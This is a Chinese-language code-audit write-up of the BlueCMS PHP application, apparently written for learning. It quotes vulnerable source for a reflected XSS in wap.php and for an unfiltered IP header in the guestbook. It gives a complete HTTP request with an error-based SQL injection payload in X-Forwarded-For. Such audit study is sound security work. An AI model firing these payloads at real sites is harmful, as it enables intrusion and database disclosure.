bluecms是一个非常简单的cms适合入门学习php代码审计,这里直接用上seay进行自动审计在一个个验证
前台xss,出现在wap.php,通过request方式接受t参数并且直接输出
<?php
$t=$_REQUEST['t'];
//echo $t;
//exit;
?>
<script type="text/javascript">
//如果只跳转首页+启用动态浏览就把wap.php设置为第一个默认文档 如果启用静态浏览就把index.html设置为第一个默认文档 在index.html里加入跳转到手机站的判断代码
var mobileAgent = new Array("iphone", "ipod", "ipad", "android", "mobile", "blackberry", "webos", "incognito", "webmate", "bada", "nokia", "lg", "ucweb", "skyfire");
var browser = navigator.userAgent.toLowerCase();
var isMobile = false;
for (var i=0; i<mobileAgent.length; i++)
{
if (browser.indexOf(mobileAgent[i])!=-1)
{
isMobile = true;
//alert(mobileAgent[i]);
location.href = 'm.php?t=<?php echo $_REQUEST['t'] ?>';
break;
}
else
{
location.href = 'index.php?t=<?php echo $_REQUEST['t'] ?>';//首页模板不要加跳转到手机站的判断代码
}
}
</script>
直接访问wap.php?t=就能直接触发
留言板报错注入这里因为没有对ip头进行过滤就拼接进sql语句中
function add(){
if($GLOBALS['G_DY']['vercode']==1){
if(!$this->syArgs("vercode",1)||md5(strtolower($this->syArgs("vercode",1)))!=$_SESSION['doyo_verify'])message("验证码错误");
}
if(!$this->syArgs('tid'))message("请选择栏目");
$tid=$this->syArgs('tid');
$this->type=syDB('classtype')->find(array('tid'=>$tid),null,'molds,classname,msubmit');
if($this->type['msubmit']!=1){
$this->member->p_r($this->type['msubmit']);
}
$isshow = ($this->my['group']['audit']==1) ? 1 : 0;
$user = ($this->my['id']!=0) ? $this->my['user'] : '游客';
$fmolds = ($this->syArgs('fmolds',1)!='') ? $this->syArgs('fmolds',1) : '';
$title = ($this->syArgs('title',1)!='') ? $this->syArgs('title',1) : $this->type['classname'];
$body = ($this->syArgs('body',1)!='') ? $this->syArgs('body',1) : '';
$row1 = array('tid' => $tid,'fmolds' => $fmolds,'faid' => $this->syArgs('faid'),'title' => $title,'addtime' => time(),'orders' => 0,'isshow' => $isshow,'user' => $user,'body' => $body,'reply'=>'');
$row2=$this->fields_args('message',$tid);
$add = syClass('c_message');
$newv=$add->syVerifier($row1);
echo $newv;
if(false == $newv)
{
$a=$add->create($row1);$row2=array_merge($row2,array('aid' => $a));
syDB('message_field')->create($row2);
if($this->my['id']!=0){
syDB('member_file')->update(array('hand'=>$this->syArgs('hand'),'uid'=>$this->my['id']),array('hand'=>0,'aid'=>$a,'molds' => 'message'));
}else{
syDB('member_file')->update(array('hand'=>$this->syArgs('hand'),'ip'=>GetIP()),array('hand'=>0,'aid'=>$a,'molds' => 'message'));
}
//message('发布成功',$GLOBALS["WWW"]);//bluecms 返回到了首页
message('发布成功');//回到当前页面
}
else
{
message_err($newv);
}
直接构造号数据包
POST /index.php?c=message&a=add&tid=23 HTTP/1.1
Host: www.blue.com:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Forwarded-For: 8.8.8.8' and (updatexml(1,concat(0x7e,(select user()),0x7e),1))####
Content-Type: application/x-www-form-urlencoded
Content-Length: 62
Origin: http://www.blue.com:8080
Connection: close
Referer: http://www.blue.com:8080/?c=message&a=type&tid=23
Cookie: PHPSESSID=1gobivh9getno63fuj0d67knn5
Upgrade-Insecure-Requests: 1
title=111&u_nianlin=111&download=111&hand=0006197981&body=1111
就到这里了这里的密码使用了两次md5加密,其实还有好多漏洞没有审计出来